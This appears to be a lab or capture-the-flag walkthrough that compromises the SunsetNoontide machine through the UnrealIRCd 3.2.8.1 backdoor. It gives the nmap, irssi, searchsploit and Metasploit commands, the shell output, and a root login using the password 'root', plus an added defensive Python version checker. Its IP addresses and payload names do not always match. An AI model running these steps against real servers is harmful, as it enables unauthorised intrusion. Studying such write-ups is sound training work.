Exploitation Guide for SunsetNoontide
Summary
This machine is compromised through a remote code execution vulnerability in the UnrealIRCd 3.2.8.1 IRC server. Privileges are then escalated using a trivially weak password on the root account.
Enumeration
Nmap
We start off by running an nmap scan:
kali@kali:~$ sudo nmap 192.168.187.120
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 11:30 EST
Nmap scan report for 192.168.120.228
Host is up (0.035s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
6667/tcp open  irc
IRC
This scan shows a potential IRC server running on port 6667.
Let’s connect to this IRC server to see if we can gather more information.
We’ll use irssi here but any other IRC client will do.
kali@kali:~$ irssi
[(status)] /server connect 192.168.187.120
11:11 -!- Irssi: Looking up 192.168.187.120
11:11 -!- Irssi: Connecting to 192.168.187.120 [192.168.120.165] port 6667
11:11 -!- Irssi: Connection to 192.168.187.120 established
11:11 !irc.foonet.com *** Looking up your hostname...
11:11 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
11:11 -!- You have not registered
11:11 -!- Welcome to the ROXnet IRC Network kali!kali@192.168.118.9
11:11 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
11:11 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
11:11 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
11:11 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
11:11 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
11:11 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
11:11 -!- There are 1 users and 0 invisible on 1 servers
11:11 -!- I have 1 clients and 0 servers
11:11 -!- Current Local Users: 1  Max: 1
11:11 -!- Current Global Users: 1  Max: 1
11:11 -!- MOTD File is missing
11:11 -!- Mode change [+iwx] for user kali
The registration replies show that the IRC server identifies itself as Unreal version 3.2.8.1.
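A defender inventorying IRC servers can pull the same version string from the raw RPL_YOURHOST (002) and RPL_MYINFO (004) replies that irssi renders above and flag the backdoored release. The Python below is an added example, not part of the original guide; the raw reply lines are constructed samples, and irc.example.net is a hypothetical second host included only to show a non-flagged result.

```python
import re

# Constructed sample of the raw registration replies (numerics 001, 002 and 004)
# that an IRC client such as irssi renders as "Your host is ..., running version ...".
# irc.foonet.com mirrors the guide's target; irc.example.net is a hypothetical second host.
SAMPLE_REPLIES = """\
:irc.foonet.com 001 kali :Welcome to the ROXnet IRC Network kali!kali@192.0.2.10
:irc.foonet.com 002 kali :Your host is irc.foonet.com, running version Unreal3.2.8.1
:irc.foonet.com 004 kali irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.example.net 002 kali :Your host is irc.example.net, running version Unreal3.2.9
"""

# Versions an inventory should flag; Unreal3.2.8.1 is the backdoored release shown above.
FLAGGED_VERSIONS = {"Unreal3.2.8.1"}
VERSION_RE = re.compile(r"running version (\S+)")

def parse_myinfo(line):
    """RPL_MYINFO (004): ':<prefix> 004 <nick> <server> <version> <umodes> <cmodes>'."""
    parts = line.split()
    if len(parts) < 5 or parts[1] != "004":
        return None
    return parts[3], parts[4]

def parse_yourhost(line):
    """RPL_YOURHOST (002): free-text trailer, so fall back to a regex on 'running version'."""
    parts = line.split(maxsplit=3)
    if len(parts) < 4 or parts[1] != "002":
        return None
    match = VERSION_RE.search(parts[3])
    return (parts[0].lstrip(":"), match.group(1)) if match else None

def audit_servers(raw_replies):
    """Map each server seen in the replies to (version, flagged)."""
    findings = {}
    for line in raw_replies.splitlines():
        # Prefer the structured 004 field; fall back to the 002 free text.
        parsed = parse_myinfo(line) or parse_yourhost(line)
        if parsed is None:
            continue
        server, version = parsed
        findings[server] = (version, version in FLAGGED_VERSIONS)
    return findings

if __name__ == "__main__":
    for server, (version, flagged) in sorted(audit_servers(SAMPLE_REPLIES).items()):
        print(f"{server}: {version} -> {'FLAGGED' if flagged else 'ok'}")
```

Feed it the raw lines captured from a client's registration exchange (irssi's /rawlog, for instance) rather than the rendered output shown above.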
Exploitation
Remote Code Execution
Looking up exploits for this version, we find that it is vulnerable to remote code execution:
kali@kali:~$ searchsploit "3.2.8.1"
-------------------------------------------------------------- ----------------------
 Exploit Title                                                | Path
-------------------------------------------------------------- ----------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)  | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow       | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                | linux/remote/13853.pl
-------------------------------------------------------------- ----------------------
…
We can use the Metasploit framework module unix/irc/unreal_ircd_3281_backdoor and the payload cmd/unix/reverse_perl to achieve RCE:
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.187.120  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 0
payload => cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.187.120:6667 - Connected to 192.168.187.120:6667...
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.187.120:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.187.120:4444
id
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.187.120:4444) at 2021-09-09 11:23:30 -0400

uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
cd /home
su root
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
hostname
noontide